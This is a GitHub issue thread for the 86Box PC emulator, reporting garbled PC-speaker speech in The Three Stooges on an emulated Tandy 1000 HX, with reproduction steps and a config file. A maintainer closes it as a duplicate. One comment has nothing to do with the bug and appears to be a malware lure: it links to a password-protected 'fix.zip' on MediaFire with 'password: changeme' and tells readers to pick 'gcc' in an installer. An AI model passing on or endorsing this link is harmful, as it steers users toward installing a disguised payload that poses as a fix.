### ISSUE TITLE
Three Stooges unclear speech

### ISSUE THREAD

**Issue by ualaa1** [86Box/86Box#4763]
### What happened?

Speech is only available if the game detects Tandy. The speech uses the PC Speaker and not the Tandy DAC.
The speech is garbled and mostly unintelligible In the intro, with a lot of buzzing on 86Box. Have already tried various CPU speeds

Compare to real hardware, where it is clear: https://www.youtube.com/watch?v=4ADdkkzshbs&t=40s

Game download: https://archive.org/details/002218-TheThreeStooges
Boot up a Tandy 1000 HX or Tandy SL/2 (with 640kb not 728 kb)
Then insert the image load stooges.exe, then press a keyboard button when the prompt asks for a joystick button press

### Configuration file

```ini
[General]
vid_renderer = qt_software
host_cpu = Intel(R) Core(TM) i7-9750H CPU @ 2.60GHz
emu_build_num = 6088
uuid = b3013b68-9fce-5b63-b7f2-0ea9a0dcc618

[Machine]
machine = tandy1000hx
cpu_family = necv20
cpu_speed = 16000000
cpu_multi = 1
cpu_use_dynarec = 0
fpu_softfloat = 0
time_sync = local
fpu_type = 8087
mem_size = 640

[Video]
gfxcard = internal

[Input devices]
mouse_type = none

[Sound]
fm_driver = nuked

[Network]
net_01_link = 0
net_02_link = 0
net_03_link = 0
net_04_link = 0

[Storage controllers]
hdc = none
cassette_mode = load

[Floppy and CD-ROM drives]
fdd_02_image_history_03 = introjr.IMA
fdd_02_type = 525_2qd
fdd_02_turbo = 1
fdd_01_turbo = 1
fdd_01_image_history_01 = disk01.img
fdd_02_image_history_01 = pitfighter install.IMA
fdd_02_image_history_04 = Tennis Cup Disk A & B.IMG
fdd_01_image_history_02 = Paperboy 2 (1991) (360K) [!].ima
fdd_01_image_history_03 = disk2.img
fdd_01_type = 525_2qd
fdd_01_image_history_04 = disk1.img
```

### Operating system

Windows 11

### CPU

Intel Core i7-9750H 

### 86Box version

4.2.1 6088

### Build architecture

Windows 64 bit

### Build type

- [ ] New recompiler
- [ ] Debug build

### Download source

Official website (Jenkins, GitHub)

**Comment by cnhbliyou** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by OBattler** [comment]
Closing because it's being tracked in #4765 .
